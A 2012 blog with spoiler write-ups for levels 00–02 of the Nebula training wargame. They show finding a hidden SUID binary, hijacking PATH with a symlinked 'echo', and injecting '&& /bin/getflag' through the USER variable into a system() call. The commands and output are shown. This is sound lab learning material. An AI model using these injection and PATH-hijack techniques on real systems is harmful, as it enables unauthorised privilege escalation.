19 August 2012

Exploit.Exercise.com - Nebula - Level02

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

Level02 is similar to Level01 in that it you don't need to know about C++ as much as you need to understand what is going on at the command line. You can see from the level02 code that it executes /bin/echo which prints the $USER variable. So, let's change the $USER variable to execute our getflag command.

There are 3 different ways to chain linux command together. I chose to use the ampersand (&).
$ USER="foo && /bin/getflag"
$ export USER
$ ./flag02
about to call system("/bin/echo foo && /bin/getflag is cool")
foo
You have successfully executed getflag on a target account

There you have it!

If you are still shady on why that worked, try this on your command line.
$ echo test1 && echo test2 && echo test3

18 August 2012

Exploit.Exercise.com - Nebula - Level01

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

With level01 you don't need to know about programing in C++ as much as you do about how Linux calls binary commands. So, read the blurb over at Wikipedia about the $PATH variable. The whole point in how the $PATH variable effects Linux/Unix systems is that when a command needs to be executed; Linux/Unix needs to find where it is and the $PATH variable specifies where to look.

So, skimming through the source code shown on Nebula level01, you'll see that the program runs the echo command which prints out "and what now?". But remember what you read at Wikipedia about the $PATH variable? The only way to deliberately execute a command in a specific location is to use (./) . Therefore, as you can see by the source code, the echo command isn't being deliberately executed. It is being found using the $PATH variable and executed at the first instance it is located. What if there was another echo command somewhere else that we could point the $PATH variable too? Perhaps an echo command that we created...that ran the getflag binary for us :)

To do this, we create a symbolic link from the command echo (that we created) to the target binary: 'getflag'.

First, make sure we are in /home/flag01
$ cd ~
Now, create soft simlink
$ ln -s /bin/getflag echo
Then export the $PATH to update it.
export PATH=/home/level01:$PATH
Make sure it worked
echo $PATH
Finally, run flag01
$ /home/flag01/flag01
You have successfully executed getflag on a target account

13 August 2012

Exploit.Exercise.com - Nebula - Level00

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

Level00 wants you to find a Set User ID program that is hidden in the filesystem. Level00 says that the SUID program runs as user 'flag00'.

The linux command find works really well for this task.

The level00 documentation gives us two clues about the file. It is executable and it runs as the 'flag00' user. From looking at the man page, we know we can find files with those criteria.

Running this command
[email protected]:~$ find / -user flag00 -executable -print
returns a bunch of permission errors.

So we run this to clean it up (send the errors to /dev/null)
[email protected]:~$ find / -user flag00 -executable -print 2> /dev/null
/home/flag00
/bin/.../flag00

Checking out /home/flag00 doesn't seem to show anything interesting
[email protected]:~$ ls -la /home/flag00
total 20
drwxr-x---  2 flag00 level00 4096 2011-11-20 20:21 .
drwxr-xr-x 43 root   root    4096 2011-11-20 20:21 ..
-rw-r--r--  1 flag00 flag00   220 2011-05-18 02:54 .bash_logout
-rw-r--r--  1 flag00 flag00  3353 2011-05-18 02:54 .bashrc
-rw-r--r--  1 flag00 flag00   675 2011-05-18 02:54 .profile

Let's check out
[email protected]:~$ ls -la /bin/.../flag00
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /bin/.../flag00

There we go, its executable. Let's try it out.
[email protected]:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!

And finally we get what we came for...
[email protected]:~$ getflag
You have successfully executed getflag on a target account
[email protected]:~$